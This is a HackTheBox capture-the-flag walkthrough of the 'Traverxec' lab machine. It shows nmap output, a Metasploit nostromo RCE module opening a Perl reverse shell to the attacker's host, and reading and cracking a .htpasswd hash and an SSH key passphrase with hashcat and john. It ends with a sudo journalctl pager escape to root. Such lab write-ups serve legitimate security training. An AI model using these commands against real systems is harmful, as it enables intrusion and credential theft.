Hackthebox – Traverxec
Traverxec is an easy machine which should not be too dificult. However, after Hackthebox – Forest, I learned not to underestimate anything labelled as easy. Let’s start with a portscan
root@kalivm:~/Traverxec# nmap -A -oN fullscan-A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 08:10 CET
Nmap scan report for 10.10.10.165 (10.10.10.165)
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 16.69 ms 10.10.14.1 (10.10.14.1)
2 16.64 ms 10.10.10.165 (10.10.10.165)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done 1 IP address (1 host up) scanned in 18.59 secondsSo all that is open, is the SSH server and a web server. Nothing of too much interest and after some poking around, I found that most gobuster actions result in disconnects so the web pages themselves are probably for now not the way to go.
After some research on the nostromo webserver, I found this MSF exploit and was too lazy to convert it to some python based thing even though I learned that through OSCP. I decided to save the .rb file in the /usr/share/metasploit-framework/modules/exploits/linux/http directory and start MSF.
root@kalivm:~/Traverxec# msfconsole
msf5 > search nostromo
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/nostromo_traverxec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution
msf5 > use 0
msf5 exploit(linux/http/nostromo_traverxec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(linux/http/nostromo_traverxec) > set LHOST tun0
LHOST => 10.10.15.48
msf5 exploit(linux/http/nostromo_traverxec) > exploit
[*] Started reverse TCP handler on 10.10.15.48:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.48:4444 -> 10.10.10.165:39646) at 2019-11-21 09:14:54 +0100
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ So now i’ve got a working Shell, next up finding out how to become the user David, and access the user.txt. After some browsing around doing the usual privilege escalation stuff, I had not yet found much of interest. but then I started taking a look at the configuration files of the Nostromo web server.
www-data@traverxec:/var/nostromo$ cat conf/nhttpd.conf
cat conf/nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_wwwNow there are several interesting things in this configuration file. First, the admin name is, as expected, David. Not much of a surprise as I had also seen this on the frontpage, and in the /etc/passwd file. There is however, a location provided where .htaccess and .htpasswd files are located, these may contain credentials. Another interesting part, is the fact that apparently, public_www directories in home directories are also published by nostromo! If this directory exists in David’s home directory, it should be readable by my current www-data user in order to publish it online.
www-data@traverxec:/var/nostromo$ ls /home/david/public_www
index.html protected-file-area
www-data@traverxec:/var/nostromo$ ls /home/david/public_www/protected-file-area
ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgzAfter a quick check, the directory exists, contains a subdirectory, and even more interesting, seems to contain a backup file with ssh-identity files. This may be my way to user!
www-data@traverxec:/var/nostromo$ cat conf/.htpasswd
cat conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
This looks like a regular MD5 hash which should not be too hard to crack.
$ hashcat -m 500 -w 3 -a 0 traverxec.hash ./rockyou.txt --username
hashcat (v5.1.0) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 6GB, 1518/6075 MB allocatable, 10MCU
---snip---
* Filename..: ./rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Thu Nov 21 08:52:01 2019 (9 secs)
Time.Estimated...: Thu Nov 21 08:52:10 2019 (0 secs)
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1271.4 kH/s (105.97ms) @ Accel:1024 Loops:500 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10813440/14344385 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidates.#1....: XiaoNianNian -> Ms.KEL
Hardware.Mon.#1..: Temp: 45c Fan: 24% Util:100% Core:1898MHz Mem:3802MHz Bus:16
Started: Thu Nov 21 08:51:59 2019
Stopped: Thu Nov 21 08:52:11 2019My expectations were right, in just under 10 seconds the password was cracked to be Nowonly4me. However, I do not yet have the tgz file I saw, so lets take a look at that file in a browser.
As expected, I get a login screen with HTTP Basic authentication, time to try the username and password as I cracked them
Bingo, I now got access to the zipfile, so I download it, unzip it and try the id_rsa file I found.
root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa': So there’s a password on the keyfile. I’ve seen this before in Hackthebox – Ghoul and several other boxes so this should be a piece of cake.
root@kalivm:~/Traverxec# python /usr/share/john/ssh2john.py home/david/.ssh/id_rsa > david.hash
root@kalivm:~/Traverxec# john david.hash --format=SSH
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hunter (home/david/.ssh/id_rsa)
Proceeding with incremental:ASCII
1g 0:00:00:03 3/3 0.2673g/s 922742p/s 922742c/s 922742C/s staricho..starisse
Session completedDone, the password is hunter.
root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Thu Nov 21 02:58:35 2019 from 10.10.15.18
david@traverxec:~$ cat user.txt
7db0b484<NOFLAG>cec20750d9782f3dAfter I try to login as used david, with the ssh-key passphrase hunter, I can access the user.txt flag.
Privilege escalation
After the next step of privilege escalation recon, I find a file in david’s home directory called server-stats.sh
david@traverxec:~$ cat bin/server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat I take a look at this file and see that journalctl is called with sudo (root) privileges. This is interesting as journalctl is a known GTFObins privilege escalation path. so I decide to try it
david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2019-11-21 02:10:13 EST, end at Thu 2019-11-21 03:00:33 EST. --
Nov 21 02:58:41 traverxec sudo[4155]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/var/nostromo/conf ; USER=root ; COMMAND=dav
Nov 21 03:00:04 traverxec su[4339]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:06 traverxec su[4339]: FAILED SU (to david) www-data on pts/3
Nov 21 03:00:21 traverxec su[4373]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:23 traverxec su[4373]: FAILED SU (to root) www-data on pts/3
!/bin/sh
# cat /root/root.txt
9aa36a6d<NOFLAG>d320a478f6e0d906And there we have the root flag!
